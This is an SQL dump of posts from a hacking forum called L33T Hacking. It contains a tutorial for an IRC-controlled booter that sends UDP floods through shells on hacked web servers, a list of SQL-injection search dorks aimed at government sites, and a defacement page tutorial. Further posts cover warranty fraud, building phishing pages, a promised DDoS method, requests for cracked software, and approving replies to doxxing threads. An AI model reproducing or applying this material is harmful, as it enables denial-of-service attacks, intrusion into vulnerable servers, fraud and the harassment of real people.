amtlib.dll file or whatever it\'s called with a cracked version.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '280a5ca6f0a9ea4f3383613668d1a1a6', '0', '0'); INSERT INTO mybb_posts VALUES('6938', '1180', '0', '16', 'What is Social Engineering?', '0', '82', 'iTzIpod', '1351894475', '[align=center]In every service thread and eBook thread there is usually one member who wonders what social engineering is. I\'ve made this thread to assist you with the topic since when you Google \"social engineering\", you will get to a post that either states that it\'s a security breach or simply hacking.\n\n[size=medium][u][i][b][font=Arial]What is Social Engineering? [/font][/b][/i][/u][/size]\n\nSocial engineering is the art of manipulation. You\'re using manipulation to obtain either free items or to obtain information though you will mainly be using the free item version of social engineering. Social engineering is illegal and can get you in legal manners if you do not know what you are doing. L33tHacking is not responsible for these acts but the reviewing team and administration will attempt to keep these sections as safe as possible. If a service or eBook is too risky, it will be closed instantly. Always look for the review written by a review team member to assure that everything is safe.\n\n\n[size=medium][font=Arial][u][i][b]Types of Social Engineering [/b][/i][/u][/font][/size]\nThere are several types of social engineering to obtain items but the most common and safest one is using a warranty exploit. Using a warranty exploit basically means you are exploiting the companies warranty system. Lets use Microsoft for example, Microsoft has the best warranty support. I had broken my keyboard so I called them since I knew I had warranty on it and they shipped me a new keyboard back and I had to ship nothing back to them. In this exploit you will be telling the company that the item is broken. You shall then provide a PID, serial, or receipt to them to demonstrate that you own the item and then you will be sent a new item. If you must ship something back, be very careful, some companies will bill you if you do not ship anything back and others might even send a representative. Always ask what you must do in detail to the seller of the service or eBook. They should be able to provide you with everything you need for a warranty exploit. \n\n[size=medium][font=Arial][u][i][b]Risks of Social Engineering [/b][/i][/u][/font][/size]\n\n\nAlways ask your seller if anything has ever gone wrong with what you or they are doing. It is very important that you always play it safe and get to know what you\'re doing before you do it because if not you can get into trouble.\n\n[size=medium][font=Arial][u][i][b]Enjoy your shopping! [/b][/i][/u][/font][/size][/align]', '24.212.197.164', '416597412', '1', '0', '82', '1351951444', '1', '432047480c174e0d5e2abe2188c0702a', '0', '1351951444'); INSERT INTO mybb_posts VALUES('6942', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '82', 'iTzIpod', '1351896457', 'Okay, just send me a PM or IM on Skype.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '74ce6e3e6de6d853a1fe0d1336674272', '0', '0'); INSERT INTO mybb_posts VALUES('6943', '1172', '6843', '83', 'RE: [tut]How to knock someone out[/video]', '0', '228', 'VirtualLegend', '1351897157', 'The video is blocked for my country :(\n\nUsing a proxy :P', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '63477e80280f2fef24b6210d2e82c980', '0', '0'); INSERT INTO mybb_posts VALUES('6944', '305', '6904', '84', 'RE: Themejunkies.net theme rip', '0', '228', 'VirtualLegend', '1351897285', '[quote=\'t3h jok3r\' pid=\'6904\' dateline=\'1351833099\']\r\n[quote=\'VirtualLegend\' pid=\'6863\' dateline=\'1351776556\']\r\n@t3h Jok3r\r\nF*king nice theme we need also a theme like this\r\n[/quote]\r\nD@rthforums.net, forumleague and 1 more site use the same kind of theme.\r\n[/quote]\r\n\r\nYour Right, We need to be original', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'e6aa763670c956a4fe70efcd70252a73', '0', '0'); INSERT INTO mybb_posts VALUES('6945', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '228', 'VirtualLegend', '1351897431', 'Can i still join Please ?', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '7001aebd6da36b5fdb160b013ac3d122', '0', '0'); INSERT INTO mybb_posts VALUES('6946', '1181', '0', '7', 'Who wants Jok3rs private DDoSing method', '0', '5', 'Timmy', '1351916878', 'I asked Jok3r if I can post his private DDoSing method and he said he doesnt mind so do you guys want jok3rs private ddosing method. With this you can hit off sites like anarchy within 30 secs guarantee. If you have like 8 people helping you with this one then you can hit HF offline but would not recommend anyone to use on HF.\r\n\r\nThis requires no booters, help from others or 100 hours. So do you want to see this?\r\n\r\n6+ votes then I will share it.', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', 'd47289baea1219496196922d507d0ef5', '0', '0'); INSERT INTO mybb_posts VALUES('6947', '1179', '6920', '4', 'RE: LSD is here', '0', '5', 'Timmy', '1351917012', 'Welcome to L33T Hacking LSD. Hope you enjoy your stay.', '173.245.64.81', '-1376436143', '1', '0', '5', '1351917040', '1', '27fdab40e0a95829c6de32e60fbb4615', '0', '1351917040'); INSERT INTO mybb_posts VALUES('6948', '1166', '6930', '46', 'RE: [Guide] Reporting Phishing Pages', '0', '5', 'Timmy', '1351917183', '[quote=\'sirchamp\' pid=\'6930\' dateline=\'1351890232\']\r\n[quote]l33thacking.net then the phished URL would be l33thacking.net [/quote]\r\nI dont see any difference there.\r\n[/quote]\r\n\r\nLol I don\'t see any difference too. Maybe its auto correct.', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', '1165659224af9efa4b1eb79f717aeebe', '0', '0'); INSERT INTO mybb_posts VALUES('6949', '467', '2203', '44', 'RE: Bestbuy PSD', '0', '5', 'Timmy', '1351917217', '12 views and no replies? Come on', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', 'b6b6cb809307ab4e94dddc03dcc05968', '0', '0'); INSERT INTO mybb_posts VALUES('6950', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '5', 'Timmy', '1351917288', 'Rolflol nice tips thanks and looks interesting.', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', '682a12195a22a2fb95b09f0d482fa3e2', '0', '0'); INSERT INTO mybb_posts VALUES('6951', '1182', '0', '3', 'Can we report dead links?', '0', '5', 'Timmy', '1351917356', 'Can we report threads with dead download links?', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', 'b83cbde9cb2a3ea602a829e144280a44', '0', '0'); INSERT INTO mybb_posts VALUES('6961', '1187', '0', '7', 'L33T Hacking keywords', '0', '8', 'spacefish36', '1351922442', '[code]\r\nRead the last comment before taking any action\r\n[/code]\r\n\r\nfree booter\r\ncoding\r\nhacking\r\nSQL Injection\r\nHTML\r\nPHP\r\nSkype resolver\r\nHacking forums\r\nRAT\r\nKeylogger\r\nCrypter\r\ncloudflare\r\nbotnet\r\nIRC\r\nE-whoring\r\nsocial engineering\r\nmoney making\r\nblackhat \r\nwhitehat\r\ngreyhat\r\nmonetizing\r\nmusic\r\ntop 10 music\r\nvpn\r\njava drive by\r\njava drive by setup\r\nfree java drive by\r\nhosting\r\nwebsite\r\nmybb\r\nforums\r\nproxy checker\r\nmoney\r\nhack\r\nhacker forum\r\ncracked\r\nexploit\r\nphishing\r\ndumps\r\npids\r\nserials\r\ngraphics\r\nphotoshop\r\ngimp\r\nonline\r\nDOX\r\nSEO\r\nAnonymous Hackers\r\nHosting Review\r\nawards\r\npatch\r\nadf.ly\r\noffshore\r\ndeface\r\ndork\r\nppc\r\nadvertising\r\nwebmaster\r\nporn\r\nyoutube bot\r\nfacebook bot\r\npaypal bot\r\nbrute forcer\r\nfree\r\nminecraft\r\ngaming cheats\r\nemail\r\n\r\n\r\n[code]\r\nThis is to help build more backlinks and get more members through search engines and don\'t edit anything.\r\n[/code]', '173.245.64.81', '-1376436143', '0', '0', '0', '0', '1', '399ddb9b60eb6ced1f43aae14ef3f787', '0', '0'); INSERT INTO mybb_posts VALUES('6956', '1183', '0', '46', '[TUT] Getting Images from index', '0', '4', 'Triple H', '1351918452', 'If you are creating a phishing page to make it look more realistic you need the images on the page.\r\n\r\nThis is pretty easy.\r\n\r\n1. Right Click\r\n2. Inspect Element\r\n3. Find the image\r\n4. Right click>open in new tab\r\n5. Save the image and DON\'T RENAME anything.', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', '2cee5fe1a29dac59cfebc1155ad70119', '0', '0'); INSERT INTO mybb_posts VALUES('6957', '1184', '0', '67', 'Making an IRC based shell booter', '0', '4', 'Triple H', '1351918794', 'I am sharing it here as I know their are many booter owners so I know some people will find this useful.\r\n\r\n[b]Requirements:[/b]\r\n\r\n(Hacked) Webserver/Server with php engine\r\nPHP functions which are not blocked:\r\nfsocketopen();\r\nfile_get_contents();\r\nset_time_limit(0);\r\nAccess to an IRC Server/channel (can be a public one)\r\nPHP DoS Shells\r\nMy php script\r\n\r\n[b]How to set it up:[/b]\r\n\r\n1. Copy the script (at the end of this thread) and put it into an editor.\r\n2. Configure the following things in your editor to your IRC Server:\r\n\r\n[php]\r\n//Config\r\n\r\n$IRC_SERVER = \"irc.server.com\";\r\n$IRC_PORT = \"6667\";\r\n$IRC_NICK = \"[BOOTER]\";\r\n$IRC_CHANNEL = \"#channel\";\r\n$IRC_MASTERPASS = \"password\"; \r\n3. Save the file as shellbooter.php (can be named to anything you want)\r\n4. Upload the file to your server\r\n5. Run the script by visiting the website in your browser ( http://exampleserver.com/shellbooter.php ) -> The booter will join your IRC Server/Channel\r\n6. Check your channel on your IRC Server for the booter.\r\n\r\nSetting up your list of shells:\r\nPut all your shells into a .txt file like this:\r\nCode:\r\nhttp://server1.com/shell.php\r\nhttp://server2.net/x32.php\r\nhttp://www.server3.info/somefolder/maybe/shell.php\r\n[/php]\r\n\r\nAnd upload it somewhere, where you can directly access it.\r\nFor example with dropbox.\r\n\r\n[b]How to control it:[/b]\r\n\r\nYou can control the booter with the following commands:\r\n\r\n[code]\r\n!join <channel> -> Join Channel\r\n!part <channel> -> Leave Channel\r\n!kill <Masterpass> -> Kills the bot\r\n!getlist <URL> -> Gets the list of shells\r\n!flood <IP> <Port> <Time (sec)> -> Flood\r\n[/code]\r\n\r\nFirst you need to let your booter know about your shells. You do that like this:\r\n\r\n[code]\r\n!getlist http://someserver/directlike/to/shells.txt\r\n[/code]\r\nThe booter will reply with:\r\n[code]\r\n[SHELLS] - Amount of shells: XX\r\n[/code]\r\n\r\nThen you can let it boot. You do that like this (example):\r\n\r\n[code]\r\n!flood 123.123.123.123 80 20\r\n[/code]\r\n\r\nThe booter will reply with:\r\n\r\n[code]\r\n[UDP Flood] - Host: 123.123.123.123 | Port: 80 | Time: 20 | Sending to shells...\r\n[/code]\r\n\r\nThat\'s all. Your IRC Booter will send the request to your shells.\r\nFeel free to mod the script or whatever you want to do with it:)\r\n\r\n[u]PHP Script:[/u] http://www.mediafire.com/?o1q3hcrfobvutp0', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', 'ab358ecf1f5cdfee4e5b9fc2260cf580', '0', '0'); INSERT INTO mybb_posts VALUES('6958', '1144', '6706', '11', 'RE: What can you do with?', '0', '4', 'Triple H', '1351918876', 'You can DOX them, boot them offline, send them viruses or steal all their keystrokes.', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', 'faf619ced743584d02344bfb9c793ce6', '0', '0'); INSERT INTO mybb_posts VALUES('6959', '1185', '0', '13', 'SQL Dorks for .gov', '0', '4', 'Triple H', '1351918923', '[code]\r\ninurl:index.php?id= site:*gov.pl\r\ninurl:index.php?id= site:*gov\r\ninurl:news.php?id= site:*gov.af\r\ninurl:oferta.php?id= site:*gov.af\r\ninurl:trainers.php?id= site:*gov.pl\r\ninurl:article.php?ID= site:*gov.uk\r\ninurl:play_old.php?id= site:*gov.au\r\ninurl:declaration_more.php?decl_id= site:*gov.in\r\ninurl:Pageid= site:*gov\r\ninurl:pagina.php?left= site:*.gov.au\r\ninurl:layout.php?id=120\'= site:*gov.pl\r\ninurl:principal.php?id=123\'= site:*gov.uk\r\ninurl:standard.php?base_dir= site:*gov\r\ninurl:home.php?where= site:*gov.pl\r\ninurl:page.php?sivu= site:*.pl\r\ninurl:*inc*.php?adresa= site:*gov\r\ninurl:padrao.php?str= site:*gov\r\ninurl:include.php?my= site:*.gov.af\r\ninurl:show.php?home= site:*gov.br\r\ninurl:index.php?lid=20= site:*gov.au \r\ninurl:principal.php?id=30= site:*gov\r\ninurl:file.php?id=205= site:*gov.au\r\ninurl:info.php?id=25155= site:*gov.af\r\ninurl:enter.php?id=203= site:*gov.uk\r\ninurl:general.php?id=50= site:*gov\r\ninurl:principal.php?id=705= site:*gov.za\r\ninurl:standard.php?id=303= site:*.gov.ie\r\nnurl:nota.php?v= site:*gov.bc.ca\r\ninurl:home.php?str= site:*ed.gov\r\ninurl:press.php?panel= site:*gov.mu\r\ninurl:page.php?mod= site:*gov\r\ninurl:default.php?param= site:*gov\r\ninurl:down*.php?texto= site:*go.af\r\ninurl:mod*.php?dir= site:*gov.ie\r\ninurl:view.php?where= site:*gov.za\r\ninurl:blank.php?subject= site:*gov.br\r\ninurl:path.php?play= site:*gov.uk\r\ninurl:base.php?l= site:*gov.au\r\n[/code]', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', 'c0abe46eabb7a5359d7400b23ca94c0a', '0', '0'); INSERT INTO mybb_posts VALUES('6960', '1186', '0', '68', '[HTML]Designing a Deface page', '0', '4', 'Triple H', '1351919107', 'Hello today i\'m making a short tutorial on how to make a very simple deface page.\r\n\r\nWe will do this in notepad. So open notepad.\r\n\r\nFirst of we start off with our title.\r\n\r\n[code]\r\n<html>\r\n<title> Hacked by V </title>\r\n[/code]\r\n\r\nThen we should add something like a picture.\r\n\r\n[code]\r\n<center>\r\n<img src=\"http://www.sociallyencrypted.net/images/g/se_logo_SH_w1_big_origclr_blue_texture.png\"/>\r\n[/code]\r\n\r\nThen we add our moving text.\r\n\r\n[code]\r\n<body onLoad=\"type_text()\" ; bgColor=black text=#00FFFF>\r\n<div style=\"width: 600px;height: 100px;\" align=\"center\">\r\n<script language=\"Javascript\">\r\n[/code]\r\n\r\nTo make our writing show it is important you do it in this format.\r\n\r\n[code]\r\n\"Hello there, you can call me V\",\r\n\"This is my deface page tutorial\",\r\n\"I hope this tutorial is useful\"\r\n[/code]\r\n\r\nAfter every line we write you have to add the , for every new line. It is important you don\'t do it for your last line of text though.\r\n\r\nAfter we have written all our text we use this piece of code.\r\n\r\n[code]\r\n);\r\n);\r\nvar speed=100;\r\nvar index=0; text_pos=0;\r\nvar str_length=tl[0].length;\r\nvar contents, row;\r\n\r\nfunction type_text()\r\n{\r\ncontents=\'\';\r\nrow=Math.max(0,index-40);\r\nwhile(row<index)\r\ncontents += tl[row++] + \'\\r\\n\';\r\ndocument.forms[0].elements[0].value = contents + tl[index].substring(0,text_pos) + \"_\";\r\nif(text_pos++==str_length)\r\n{\r\ntext_pos=0;\r\nindex++;\r\nif(index!=tl.length)\r\n{\r\nstr_length=tl[index].length;\r\nsetTimeout(\"type_text()\",300);\r\n}\r\n} else\r\nsetTimeout(\"type_text()\",speed);\r\n}\r\n[/code]\r\n\r\nNow we add our music to make it a little more interesting.\r\n\r\n[code]\r\n<p align=\"center\">\r\n<form><textarea style=\"width:400px; height:400px; border:0px solid gray; resize:none; background-color:black;color:red; outline:0; padding:50px; border-radius:30px; -webkit-box-shadow:0px 0px 20px 1px gray;\" name=\"about\" readonly=\"readonly\"\r\nwrap=\"soft\"></textarea></form></p>\r\n</div>\r\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br>\r\n<center><font color=#00FFFF></font></center>\r\n<center><font color=#00FFFF></font></center>\r\n<embed src=\"http://www.youtube.com/v/8pybAiBOupw&feature=plcp&context=C327ab00UDOEgsToPDskLGfjUZBwtQyDiT-NOUqQ8i&autoplay=1\" type=\"application/x-shockwave-flash\" wmode=\"transparent\" width=\"1\" height=\"1\"></embed>\r\n</center>\r\n[/code]\r\n\r\nNow for our finished piece we have.\r\n\r\n[code]\r\n<html>\r\n<head>\r\n<title>Hacked by V</title>\r\n<center>\r\n<img src=\"http://www.sociallyencrypted.net/images/g/se_logo_SH_w1_big_origclr_blue_texture.png\"/>\r\n<body onLoad=\"type_text()\" ; bgColor=black text=#00FFFF>\r\n<div style=\"width: 600px;height: 100px;\" align=\"center\">\r\n<script language=\"Javascript\">\r\nvar tl=new Array(\r\n\"Hello there, you can call me V\",\r\n\"This is my deface page tutorial\",\r\n\"I hope this tutorial is useful\"\r\n);\r\nvar speed=100;\r\nvar index=0; text_pos=0;\r\nvar str_length=tl[0].length;\r\nvar contents, row;\r\n\r\nfunction type_text()\r\n{\r\ncontents=\'\';\r\nrow=Math.max(0,index-40);\r\nwhile(row<index)\r\ncontents += tl[row++] + \'\\r\\n\';\r\ndocument.forms[0].elements[0].value = contents + tl[index].substring(0,text_pos) + \"_\";\r\nif(text_pos++==str_length)\r\n{\r\ntext_pos=0;\r\nindex++;\r\nif(index!=tl.length)\r\n{\r\nstr_length=tl[index].length;\r\nsetTimeout(\"type_text()\",300);\r\n}\r\n} else\r\nsetTimeout(\"type_text()\",speed);\r\n}\r\n</script>\r\n<p align=\"center\">\r\n<form><textarea style=\"width:400px; height:400px; border:0px solid gray; resize:none; background-color:black;color:red; outline:0; padding:50px; border-radius:30px; -webkit-box-shadow:0px 0px 20px 1px gray;\" name=\"about\" readonly=\"readonly\"\r\nwrap=\"soft\"></textarea></form></p>\r\n</div>\r\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br>\r\n<center><font color=#00FFFF></font></center>\r\n<center><font color=#00FFFF></font></center>\r\n<embed src=\"http://www.youtube.com/v/8pybAiBOupw&feature=plcp&context=C327ab00UDOEgsToPDskLGfjUZBwtQyDiT-NOUqQ8i&autoplay=1\" type=\"application/x-shockwave-flash\" wmode=\"transparent\" width=\"1\" height=\"1\"></embed>\r\n</center>\r\n</body>\r\n</html>\r\n[/code]\r\n\r\n\r\n\r\nSave it as .html and voila you have finished\r\n\r\nOur finished piece. http://pastehtml.com/view/boom4o7vj.html\r\n\r\nThank you for reading the following tutorial by rizila and good luck on making your deface page.', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', 'f776ca68272ebf2c616c0f029a8771c4', '0', '0'); INSERT INTO mybb_posts VALUES('6962', '1182', '6951', '3', 'RE: Can we report dead links?', '0', '8', 'spacefish36', '1351922474', 'Yes we can. Report post as other', '173.245.64.81', '-1376436143', '0', '0', '0', '0', '1', '736269b31eeb2850aa4658de32dbde3f', '0', '0'); INSERT INTO mybb_posts VALUES('6963', '1180', '6938', '16', 'RE: What is Social Engineering?', '0', '1', 't3h jok3r', '1351925209', 'Thanks for taking out time to post this ipod.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b632a3a466703b35f2fee87156f90ca3', '0', '0'); INSERT INTO mybb_posts VALUES('6964', '719', '3646', '16', 'RE: AstroPID Clean', '0', '1', 't3h jok3r', '1351925288', 'Can someone junk this thread?\nwe already have a thread on this.\n http://l33thacking.net/thread-135.html', '72.231.24.165', '1223104677', '1', '0', '1', '1351925375', '1', '97d534f0b41cdf6719f91e5a4bffc35a', '0', '1351925375'); INSERT INTO mybb_posts VALUES('6965', '1182', '6951', '3', 'RE: Can we report dead links?', '0', '205', 'mothered', '1351943113', 'The question remains, what action can a staff member take with dead links?\r\n\r\nRemoving the link will serve the exact same purpose, as having the link there. It\'s up to the OP to rectify It.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '32546bc3f40ed6467b3696c284950150', '0', '0'); INSERT INTO mybb_posts VALUES('6966', '1179', '6920', '4', 'RE: LSD is here', '0', '228', 'VirtualLegend', '1351948196', 'Sup LSD Welcome to l33thacking \n\nHave a nice stay here', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'ceafbcfd60cc2a8d3f6bc80c0cd49b21', '0', '0'); INSERT INTO mybb_posts VALUES('6967', '1182', '6951', '3', 'RE: Can we report dead links?', '0', '228', 'VirtualLegend', '1351948251', 'You can PM the person and ask it to re upload it', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '5c2d64d3fde98cbff6fc4dc43a6a6568', '0', '0'); INSERT INTO mybb_posts VALUES('6968', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '82', 'iTzIpod', '1351949225', '+1. I want it ;P \n\nCome on guys.\n5 more votes!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c34c9f971d4444ccb098bac47a1ef7da', '0', '0'); INSERT INTO mybb_posts VALUES('6969', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '82', 'iTzIpod', '1351949257', 'You can.\n\nUpdate.\nI\'m kinda busy right now. Got a History project due on Thursday.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '01e4db5cb648360dc5be7b6377ac6944', '0', '0'); INSERT INTO mybb_posts VALUES('6970', '1170', '6839', '63', 'RE: Need a sig', '0', '82', 'iTzIpod', '1351949343', 'Okay. I\'ll get to it! \n\nPlease be patient.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aad908719dface006d9bd8881384ce6f', '0', '0'); INSERT INTO mybb_posts VALUES('6971', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '82', 'iTzIpod', '1351949375', 'You will get a non survey link.\n\nIt will be MediaFire.\nPlease wait.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '663e13a70a1c281b79298b1ced215b2a', '0', '0'); INSERT INTO mybb_posts VALUES('6972', '1187', '6961', '7', 'RE: L33T Hacking keywords', '0', '82', 'iTzIpod', '1351949526', 'Oh. This will be very helpful to try and make backlinks for LH. :)\nThanks I\'ll try to use these.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e3bd5b2475be2cd4643dbc6780f3d307', '0', '0'); INSERT INTO mybb_posts VALUES('6973', '1180', '6938', '16', 'RE: What is Social Engineering?', '0', '82', 'iTzIpod', '1351949563', 'No problem t3h jok3r! :) \nEnjoy!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ee5458c605746384f4dde43f20e57020', '0', '0'); INSERT INTO mybb_posts VALUES('6974', '719', '3646', '16', 'RE: AstroPID Clean', '0', '82', 'iTzIpod', '1351951489', 't3h jok3r, you\'re an admin why can\'t you junk it? o.O', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3fdc2c99792852419cea5c94ea118f46', '0', '0'); INSERT INTO mybb_posts VALUES('6975', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '2', 'Apathy', '1351953259', '+1 Sure I do not do this type of stuff but I am interested in his method.', '173.206.130.208', '-1378975024', '0', '0', '0', '0', '1', '6de3702eed5202761dd0a059689723a6', '0', '0'); INSERT INTO mybb_posts VALUES('6976', '1177', '6905', '43', 'RE: Free itunes/app store gift cards crack', '0', '2', 'Apathy', '1351953461', 'Old method. Sorry man. :3 This has been around for quite a while.', '173.206.130.208', '-1378975024', '0', '0', '0', '0', '1', '1a456f00abd21a17a11b4ad1a9cb5cd7', '0', '0'); INSERT INTO mybb_posts VALUES('6977', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '228', 'VirtualLegend', '1351954246', '+1 I WANT IT !!!!\n\nThanks for the heads Up', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '7b32df0c2e381aaf13d2467d606d6450', '0', '0'); INSERT INTO mybb_posts VALUES('6978', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '228', 'VirtualLegend', '1351954449', 'lmao the victim will be really good trolled by this', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'd1e6f32b13607abbe04be4305903ee72', '0', '0'); INSERT INTO mybb_posts VALUES('6979', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '199', 'Anonymous™', '1351955868', '+1 I just really want it...', '85.230.49.83', '1441149267', '1', '0', '0', '0', '1', 'a08e64e0c26825691bf219d0c6dac7de', '0', '0'); INSERT INTO mybb_posts VALUES('6980', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '2', 'Apathy', '1351960166', 'What happened to the site? I am annoyed with him and want his dox. :P', '173.206.130.208', '-1378975024', '0', '0', '0', '0', '1', 'df186c07090bd004129f4c13d434ee8b', '0', '0'); INSERT INTO mybb_posts VALUES('6981', '1182', '6967', '3', 'RE: Can we report dead links?', '0', '61', 'NXK', '1351960948', '[quote=\'VirtualLegend\' pid=\'6967\' dateline=\'1351948251\']\r\nYou can PM the person and ask it to re upload it\r\n[/quote]\r\n\r\nThis, Or you can PM a staff member and we can contact the person for you and let them know the link is dead.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '31dd4051f61baddf947057c422fda9ab', '0', '0'); INSERT INTO mybb_posts VALUES('6982', '1169', '6836', '3', 'RE: Computing Tab Forum Suggestions', '0', '61', 'NXK', '1351960987', 'I look forward to expanding this section :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'bcc650ad14a3b120b710c8f4147ab395', '0', '0'); INSERT INTO mybb_posts VALUES('6983', '1078', '6980', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '61', 'NXK', '1351961078', '[quote=\'Apathy\' pid=\'6980\' dateline=\'1351960166\']\r\nWhat happened to the site? I am annoyed with him and want his dox. :P\r\n[/quote]\r\nExpose deleted the files by accident.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '763d8285b9adc6c349c04b1863d0bbad', '0', '0'); INSERT INTO mybb_posts VALUES('6984', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '62', 'R?????zo?', '1351967603', '+1 I want it too :P\nThanks!', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '7ca654ca39ab41481865fc2e50b6fd9e', '0', '0'); INSERT INTO mybb_posts VALUES('6985', '1164', '6811', '11', 'RE: RAT Help', '0', '150', 'MinecraftGeek', '1351971030', 'Trying to RAT Deetz are you Jacob?', '109.145.196.103', '1838269543', '0', '0', '0', '0', '1', '7b3ce70c205e8864ba5a5489adc9a372', '0', '0'); INSERT INTO mybb_posts VALUES('6986', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '53', 'sirchamp', '1351973107', '1+ Final vote :D\nI doubt this is as good as it sounds but maybe it really works..', '80.62.73.66', '1346259266', '1', '0', '53', '1352019063', '1', '4310f247c30b118b8c1c0f24edccfe2e', '0', '1352019063'); INSERT INTO mybb_posts VALUES('6987', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '257', 'XxTREYZxX', '1351979722', 'I really want it thanks.\n1+', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '9efaee3c658a66886596455c11208a83', '0', '0'); INSERT INTO mybb_posts VALUES('6988', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '257', 'XxTREYZxX', '1351979798', 'Thanks for this method joker.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'd4b812117c6e7e7bbe55561d1abaa157', '0', '0'); INSERT INTO mybb_posts VALUES('6989', '1187', '6972', '7', 'RE: L33T Hacking keywords', '0', '1', 't3h jok3r', '1351984630', '[quote=\'iTzIpod\' pid=\'6972\' dateline=\'1351949526\']\r\nOh. This will be very helpful to try and make backlinks for LH. :)\r\nThanks I\'ll try to use these.\r\n[/quote]\r\n\r\nThis won\'t build any backlinks but yes this will increase our keywords. I think the thread itself is enough.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8bd808da43fcff0aa5e82f78ca1964ba', '0', '0'); INSERT INTO mybb_posts VALUES('6990', '1148', '6718', '30', 'RE: [Crack] Limitless Logger 6.7 !!', '0', '61', 'NXK', '1351985446', 'Thank god, Mephobia needs to be taken care of. He\'s scammed me before. Only 20$ But i\'m glad people are cracking his programs.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'fae14f627ddc887f8a308bbeb1069798', '0', '0'); INSERT INTO mybb_posts VALUES('6991', '1033', '5961', '30', 'RE: [FREEInstagram Bot [Worth 47$]', '0', '61', 'NXK', '1351986109', 'Very nice release. Glad to see such HQ things being given away!', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '80ced8bb0c38986d542838f4b5f63ea6', '0', '0'); INSERT INTO mybb_posts VALUES('6992', '1033', '5961', '30', 'RE: [FREEInstagram Bot [Worth 47$]', '0', '82', 'iTzIpod', '1351988055', 'Have you tested this yourself? I\'m sure this is taken from LeakForums but ever since I got a virus from there, I wanna make sure it\'s confirmed virus free and all that.\nIs it safe? Have you tested it yourself?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c9cbc030e1cdd5ce8baa1d25624eed9f', '0', '0'); INSERT INTO mybb_posts VALUES('6993', '1179', '6920', '4', 'RE: LSD is here', '0', '262', 'RAND0M1ZER', '1352000493', 'This is a nice forum, you\'ll like it and well chosen username sir!', '108.162.138.186', '1822591674', '0', '0', '262', '1352000505', '1', 'cb28ce18f64537b266cfa552bf21529a', '0', '1352000505'); INSERT INTO mybb_posts VALUES('6994', '959', '5405', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '262', 'RAND0M1ZER', '1352000586', 'lol, this is a bit sketchy for my tastes but $50 a day is nothing to be sneezed at.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '8d769ea6d405cd60f64710467cc51057', '0', '0'); INSERT INTO mybb_posts VALUES('6995', '1087', '6323', '74', 'RE: GEARS OF WAR :P', '0', '262', 'RAND0M1ZER', '1352000872', '1) I used to when it first came out, but currently I don\'t have an active XBL subscription.\n\n2) Oh I dunno, when I did play it was several times per week. Depending on my schedule.\n\n3) I\'m 19\n\n4) Male\n\n5) White\n\n6) Yep all of them.\n\n7) The one where you have to break the circle (forget what its called)\n\n8) Its the most fast paced\n\n9) Can\'t remember.\n\n9) Multiplayer, the lag can sometimes really ruin it.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '6f0b062de1f497d329d86adede891cd3', '0', '0'); INSERT INTO mybb_posts VALUES('6996', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '4', 'Triple H', '1352006658', 'Thanks Ipod. When can I have the download link?', '173.245.64.95', '-1376436129', '1', '0', '0', '0', '1', 'df75f99d9b0413657a5548e3ae20155a', '0', '0'); INSERT INTO mybb_posts 